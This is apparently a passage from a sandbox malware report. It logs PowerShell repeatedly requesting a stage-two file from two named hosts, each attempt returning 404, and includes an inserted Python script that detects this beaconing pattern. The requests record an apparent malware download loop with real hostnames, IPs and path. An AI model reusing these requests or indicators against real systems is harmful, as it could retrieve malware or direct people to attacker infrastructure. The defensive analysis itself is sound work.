    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:39:59 UTC / 121 / IN
    Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID: 7
Source IP: 192.168.2.11  Source Port: 49822  Destination IP: 184.171.244.231  Destination Port: 443  PID: 832
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp / Bytes transferred / Direction / Data
2024-12-05 09:40:04 UTC / 89 / OUT
    GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:40:04 UTC / 164 / IN
    HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:40:04 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:40:04 UTC / 315 / IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use


Session ID: 8
Source IP: 192.168.2.11  Source Port: 49834  Destination IP: 148.251.114.233  Destination Port: 443  PID: 832
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp / Bytes transferred / Direction / Data
2024-12-05 09:40:10 UTC / 98 / OUT
    GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:40:10 UTC / 238 / IN
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:40:10 GMT
    server: LiteSpeed
2024-12-05 09:40:10 UTC / 1130 / IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:40:10 UTC / 121 / IN
    Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID: 9
Source IP: 192.168.2.11  Source Port: 49851  Destination IP: 184.171.244.231  Destination Port: 443  PID: 832
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp / Bytes transferred / Direction / Data
2024-12-05 09:40:16 UTC / 89 / OUT
    GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:40:16 UTC / 164 / IN
    HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:40:16 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:40:16 UTC / 315 / IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use


Session ID: 10
Source IP: 192.168.2.11  Source Port: 49866  Destination IP: 148.251.114.233  Destination Port: 443  PID: 832
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp / Bytes transferred / Direction / Data
2024-12-05 09:40:22 UTC / 98 / OUT
    GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:40:22 UTC / 238 / IN
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:40:22 GMT
    server: LiteSpeed
2024-12-05 09:40:22 UTC / 1130 / IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:40:22 UTC / 121 / IN
    Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID: 11
Source IP: 192.168.2.11  Source Port: 49879  Destination IP: 184.171.244.231  Destination Port: 443  PID: 832
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp / Bytes transferred / Direction / Data
2024-12-05 09:40:28 UTC / 89 / OUT
    GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:40:28 UTC / 164 / IN
    HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:40:28 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:40:28 UTC / 315 / IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use


Session ID: 12
Source IP: 192.168.2.11  Source Port: 49894  Destination IP: 148.251.114.233  Destination Port: 443  PID: 832
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp / Bytes transferred / Direction / Data
2024-12-05 09:40:34 UTC / 98 / OUT
    GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:40:34 UTC / 238 / IN
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:40:34 GMT
    server: LiteSpeed
2024-12-05 09:40:34 UTC / 1130 / IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:40:34 UTC / 121 / IN
    Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID: 13
Source IP: 192.168.2.11  Source Port: 49907  Destination IP: 184.171.244.231  Destination Port: 443  PID: 832
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp / Bytes transferred / Direction / Data
2024-12-05 09:40:39 UTC / 89 / OUT
    GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:40:40 UTC / 164 / IN
    HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:40:40 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:40:40 UTC / 315 / IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use
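The sessions above all come from the same PowerShell process (PID 832) and show one URI, /wh/Subordinerendes78.smi, requested about every six seconds while alternating between www.almrwad.com and www.erp-royal-crown.info, with only Host and Connection headers (no User-Agent) and a 404 from both servers every time: a stage-two download loop whose payload was not reachable during the run. The script below is an added triage example, not part of the Joe Sandbox report; it transcribes sessions 3 to 13 from the tables above as its input and flags this retry-with-fallback pattern. The thresholds (min_requests, max_jitter) and the field layout of the transcribed records are assumptions made for the example.

```python
"""Flag a fixed-interval download loop across fallback hosts in proxied
HTTP session records (added example; not Joe Sandbox code)."""
import statistics
from datetime import datetime

# Sessions 3-13 transcribed from the report tables above as
# (session id, destination IP, request timestamp (UTC), raw request, HTTP status).
# The request headers are exactly the ones the report shows: no User-Agent.
REQUEST = ("GET /wh/Subordinerendes78.smi HTTP/1.1\r\n"
           "Host: {host}\r\nConnection: Keep-Alive\r\n\r\n")
HOST_A, HOST_B = "www.almrwad.com", "www.erp-royal-crown.info"
SESSIONS = [
    (3, "184.171.244.231", "2024-12-05 09:39:40", REQUEST.format(host=HOST_A), 404),
    (4, "148.251.114.233", "2024-12-05 09:39:46", REQUEST.format(host=HOST_B), 404),
    (5, "184.171.244.231", "2024-12-05 09:39:52", REQUEST.format(host=HOST_A), 404),
    (6, "148.251.114.233", "2024-12-05 09:39:58", REQUEST.format(host=HOST_B), 404),
    (7, "184.171.244.231", "2024-12-05 09:40:04", REQUEST.format(host=HOST_A), 404),
    (8, "148.251.114.233", "2024-12-05 09:40:10", REQUEST.format(host=HOST_B), 404),
    (9, "184.171.244.231", "2024-12-05 09:40:16", REQUEST.format(host=HOST_A), 404),
    (10, "148.251.114.233", "2024-12-05 09:40:22", REQUEST.format(host=HOST_B), 404),
    (11, "184.171.244.231", "2024-12-05 09:40:28", REQUEST.format(host=HOST_A), 404),
    (12, "148.251.114.233", "2024-12-05 09:40:34", REQUEST.format(host=HOST_B), 404),
    (13, "184.171.244.231", "2024-12-05 09:40:39", REQUEST.format(host=HOST_A), 404),
]


def parse_request(raw):
    """Split an HTTP/1.1 request head into (method, path, lower-cased header dict)."""
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def analyze(sessions, min_requests=4, max_jitter=2.0):
    """Group requests by path and score the retry-with-fallback pattern.

    A path is marked suspicious when it was requested at least min_requests
    times, against two or more distinct Host headers, every response failed
    (status >= 400), the gaps between attempts are regular (population
    standard deviation <= max_jitter seconds) and no User-Agent was ever sent.
    Thresholds are example values, not values taken from the report.
    """
    by_path = {}
    for _sid, dest_ip, ts, raw, status in sessions:
        _method, path, headers = parse_request(raw)
        entry = by_path.setdefault(
            path, {"hosts": set(), "ips": set(), "times": [], "statuses": [], "ua": False})
        entry["hosts"].add(headers.get("host", ""))
        entry["ips"].add(dest_ip)
        entry["times"].append(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"))
        entry["statuses"].append(status)
        entry["ua"] = entry["ua"] or "user-agent" in headers

    findings = {}
    for path, e in by_path.items():
        times = sorted(e["times"])
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        median_gap = statistics.median(gaps) if gaps else 0.0
        jitter = statistics.pstdev(gaps) if len(gaps) > 1 else 0.0
        all_failed = all(s >= 400 for s in e["statuses"])
        findings[path] = {
            "attempts": len(times),
            "hosts": sorted(h for h in e["hosts"] if h),
            "ips": sorted(e["ips"]),
            "all_failed": all_failed,
            "median_gap_s": median_gap,
            "jitter_s": jitter,
            "user_agent": e["ua"],
            "suspicious": (len(times) >= min_requests
                           and len(e["hosts"]) >= 2
                           and all_failed
                           and jitter <= max_jitter
                           and not e["ua"]),
        }
    return findings


if __name__ == "__main__":
    for path, f in analyze(SESSIONS).items():
        print(path, f)
```

Run against the transcribed sessions the script reports 11 attempts on one path, two Host values resolving to two destination IPs, a median gap of 6 seconds with negligible jitter, no User-Agent and a 100% failure rate, which is the combination a beaconing or failed-stage-two rule should alert on. Because every attempt returned 404, the report contains no payload for this URI, so the behaviour of the second stage cannot be read from this section.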


Session ID: 14
Source IP: 192.168.2.11
Source Port: 49920
Destination IP: 148.251.114.233
Destination Port: 443
PID: 832
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: 2024-12-05 09:40:45 UTC
Bytes transferred: 98
Direction: OUT
Data:
  GET /wh/Subordinerendes78.smi HTTP/1.1
  Host: www.erp-royal-crown.info
  Connection: Keep-Alive

Timestamp: 2024-12-05 09:40:46 UTC
Bytes transferred: 238
Direction: IN
Data:
  HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 1251
  date: Thu, 05 Dec 2024 09:40:46 GMT
  server: LiteSpeed

Timestamp: 2024-12-05 09:40:46 UTC
Bytes transferred: 1130
Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty

Timestamp: 2024-12-05 09:40:46 UTC
Bytes transferred: 121
Direction: IN
Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID: 15
Source IP: 192.168.2.11
Source Port: 49929
Destination IP: 184.171.244.231
Destination Port: 443
PID: 832
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: 2024-12-05 09:40:51 UTC
Bytes transferred: 89
Direction: OUT
Data:
  GET /wh/Subordinerendes78.smi HTTP/1.1
  Host: www.almrwad.com
  Connection: Keep-Alive

Timestamp: 2024-12-05 09:40:52 UTC
Bytes transferred: 164
Direction: IN
Data:
  HTTP/1.1 404 Not Found
  Date: Thu, 05 Dec 2024 09:40:52 GMT
  Server: Apache
  Content-Length: 315
  Connection: close
  Content-Type: text/html; charset=iso-8859-1

Timestamp: 2024-12-05 09:40:52 UTC
Bytes transferred: 315
Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID: 16
Source IP: 192.168.2.11
Source Port: 49942
Destination IP: 148.251.114.233
Destination Port: 443
PID: 832
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: 2024-12-05 09:40:57 UTC
Bytes transferred: 98
Direction: OUT
Data:
  GET /wh/Subordinerendes78.smi HTTP/1.1
  Host: www.erp-royal-crown.info
  Connection: Keep-Alive

Timestamp: 2024-12-05 09:40:58 UTC
Bytes transferred: 238
Direction: IN
Data:
  HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 1251
  date: Thu, 05 Dec 2024 09:40:57 GMT
  server: LiteSpeed

Timestamp: 2024-12-05 09:40:58 UTC
Bytes transferred: 1130
Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty

Timestamp: 2024-12-05 09:40:58 UTC
Bytes transferred: 121
Direction: IN
